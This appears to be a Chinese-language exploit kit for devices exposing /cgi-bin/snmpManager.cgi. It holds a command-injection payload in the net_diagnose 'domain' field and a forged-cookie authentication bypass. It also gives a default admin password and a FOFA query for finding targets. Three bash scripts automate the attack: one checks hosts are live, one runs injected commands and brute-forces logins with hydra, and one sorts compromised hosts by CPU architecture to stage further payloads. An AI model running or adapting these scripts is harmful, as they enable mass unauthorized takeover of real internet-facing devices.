diagnose rce

1、命令注入RCE

漏洞地址 cgimodule=net_diagnose&diagnose_type=0&domain=%7C+COMMAND"

2、认证绕过 cookie伪造

name=admin domain=$random language=0 sessionid=0 path=

3、默认密码

ieee802.11 admin 123456

check.sh
对fofa获取的ip进行针对性成活检测
用法 ./check.sh checkfile 文件中每行一个ip，格式为http://ip

v1.sh
对文本中的目标进行rce检测，并生成rce-ok rce-no 和notfound三个文件
用法 ./v1.sh 状态200文件,文件中每行一个ip，格式为http://ip

对v1.sh处理后，从rce-ok提取的ip进行分类，分为mips，i686,x86_64 ，并为执行特定payload做准备
用法 ./exp.sh filename-rce-ok 每行一个ip，格式为http://ip{,username,password},需要密码获取cookies的则需要密码，否则不需要

check.sh

#!/bin/bash
mkdir tmp
echo "e.g: ./check.sh  checkfile  "
FileName="$1"
for i in `cat $filename`
do
	url=$i/cgi-bin/snmpManager.cgi?cgimodule=login
	code=$(curl -s -o tmp/checkkk.txt -w %{http_code}  --connect-timeout 1 -m 1 $url)
#	code=$(curl -s -o tmp/checkkk.txt -w %{http_code}  --connect-timeout 0.4 -m 0.5 $url)
	if ((code == 200)) || ((cat tmp/checkkk.txt | grep /black.jpg))  >/dev/null 2>&1 ; then
            echo $i >> $filename-200
            echo  -e "\033[31m $i Success! \033[0m"
            else
            	echo $i "Failed!"
        	fi
done

v1.sh

#!/bin/bash
#这个版本为可破解web认证版本
rm tmp/*
rm -f hydra.restore
echo "e.g: ./v1.sh  filename  "
FileName="$1"
PassFile="v1pass.txt"
COMMAND=" uname -a"
random=$(cat /dev/urandom | sed "s/[^a-zA-Z0-9]//g" | strings -n 5 | head -n 1)
echo $random
for i in `cat $FileName`
	do
	echo -------------------
	whatweb $i
	url=$i/cgi-bin/snmpManager.cgi
	url_login=${url}?cgimodule=login
	url_rce=${url}?cgimodule=net_diagnose
	cookies_bypass="name=admin domain=$random language=0 sessionid=0  path="
	post_cmd="cgimodule=net_diagnose&diagnose_type=0&domain=%7C"
	post_getdata="cgimodule=ajax_diagnose"
	code_200=`curl -s -o tmp/check.txt -w %{http_code} --connect-timeout 2 -m 5 $url_login`
	if ((code_200 == 200)); then
		if  grep /black.jpg tmp/check.txt >/dev/null 2>&1 ; then
			echo 指纹匹配 ok
			curl -s -o /dev/null --cookie "$cookies_bypass"  -d $post_cmd+id $url_rce
			curl -s -o tmp/exp_log.txt --cookie "$cookies_bypass" -d $post_getdata $url
			if grep uid tmp/exp_log.txt >/dev/null 2>&1 ; then
				echo 执行命令 $COMMAND
				curl -s -o /dev/null --cookie "$cookies_bypass" -d "$post_cmd+$COMMAND" $url_rce
				curl -s --cookie "$cookies_bypass" -d $post_getdata  $url
				echo $i >> $FileName-Rce-OK
				echo " \n "
				else
				echo crack 密码
				echo > tmp/secces.txt
				Username=admin
				rhost=`echo $i | sed 's/http\:\/\///g' | cut -d ":" -f1`
				rport=`echo $i | awk -F ':' '{print $3}'`
				hydra -l $Username -P $PassFile $rhost -s $rport http-post-form "/cgi-bin/snmpManager.cgi:cgimodule=login&username=^USER^&passwd=^PASS^&language=2:black.jpg" -t 1 -f | grep http-post-form | grep password  > tmp/secces.txt
				Password=`cut -d " " -f 11 tmp/secces.txt | sed 's/^[ ]*//'| sed '/^$/d'`
				post_auth="cgimodule=login&username=$Username&passwd=$Password&language=2"
		        	if [[ -n $Password ]];then
					echo 密码破解成功
					echo "password:" $Password
					curl -s -o /dev/null -m 5  -c tmp/gbcookies.txt -d $post_auth $url_login
					curl -s -o /dev/null -m 5  -b tmp/gbcookies.txt -d $post_cmd+id $url_rce
					curl -s -o tmp/exp_log2.txt -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
					if grep uid tmp/exp_log2.txt >/dev/null 2>&1 ; then
						echo 执行命令 $COMMAND
						curl -s -o /dev/null -m 5 -b tmp/gbcookies.txt -d "$post_cmd+$COMMAND" $url_rce
						curl  -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
						echo -e "\033[33m User:$Username Pass:$Password \033[0m"
						echo $i $Username $Password >> $FileName-Rce-OK
						else
							echo -e "\033[33m User:$Username Pass:$Password But Can't RCE !!\033[0m "
							echo $i $Username $Password >> $FileName-Rce-NO
					fi
					else
						echo -e "\033[33m Password Not Found !!\033[0m "
						echo $i >> $FileName-Password-NotFound
				fi
			fi
		else
      		echo "$i failed"
      		fi
	fi
 done

exp.sh

#!/bin/bash
#这个版本利用rce-ok文件中ip直接执行命令
echo "e.g: ./exp.sh  filename-rce-ok  "
FileName="$1"
rm -f hydra.restore
PassFile="v1pass.txt"
random=$(cat /dev/urandom | sed "s/[^a-zA-Z0-9]//g" | strings -n 5 | head -n 1)
COMMAND=" uname -a"
post_cmd="cgimodule=net_diagnose&diagnose_type=0&domain=%7C"
post_getdata="cgimodule=ajax_diagnose"
for i in `cat $FileName`
	do
	rhost=`echo $i | awk '{print $1}'`
	Username=`echo $i | awk '{print $2}'`
	Password=`echo $i | awk '{print $3}'`
	echo -------------------
	whatweb $rhost
	url=$rhost/cgi-bin/snmpManager.cgi
	url_login=${url}?cgimodule=login
	url_rce=${url}?cgimodule=net_diagnose
	cookies_bypass="name=admin domain=$random language=0 sessionid=0  path="
	curl -s -o /dev/null --cookie "$cookies_bypass"  -d $post_cmd+id $url_rce
	curl -s -o tmp/exp_log.txt --cookie "$cookies_bypass" -d $post_getdata $url
	if grep uid tmp/exp_log.txt >/dev/null 2>&1 ; then
		echo 执行命令 $COMMAND
		curl -s -o /dev/null --cookie "$cookies_bypass" -d "$post_cmd+$COMMAND" $url_rce
		curl -s -o tmp/rce-data --cookie "$cookies_bypass" -d $post_getdata  $url
		if grep mips tmp/rce-data >/dev/null 2>&1; then
			echo $rhost >> $FileName-rce-mips
			cat tmp/rce-data
			echo "\n"
			elif	grep i686 tmp/rce-data >/dev/null 2>&1; then
				echo $rhost >> $FileName-rce-i686
				cat tmp/rce-data
				echo "\n"
			else
				cat tmp/rce-data
				echo "\n"
				echo $rhost >> $FileName-rce-x86_64
			fi
		else
		post_auth="cgimodule=login&username=$Username&passwd=$Password&language=2"
		echo 执行命令 $COMMAND
		curl -s -o /dev/null -m 5 -c tmp/gbcookies.txt -d $post_auth $url_login
		curl -s -o /dev/null -m 5 -b tmp/gbcookies.txt -d "$post_cmd+$COMMAND" $url_rce
		curl -s -o tmp/rce-data -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
		echo -e "\033[33m User:$Username Pass:$Password \033[0m"
		if grep mips tmp/rce-data >/dev/null 2>&1; then
			echo $rhost >> $FileName-rce-mips
			cat tmp/rce-data
			echo "\n"
			elif	grep i686 tmp/rce-data >/dev/null 2>&1; then
				echo $rhost >> $FileName-rce-i686
				cat tmp/rce-data
				echo "\n"
			else
				cat tmp/rce-data
				echo "\n"
				echo $rhost >> $FileName-rce-x86_64
				fi
	fi
 done

FoFa 搜索语句

"/cgi-bin/snmpManager.cgi"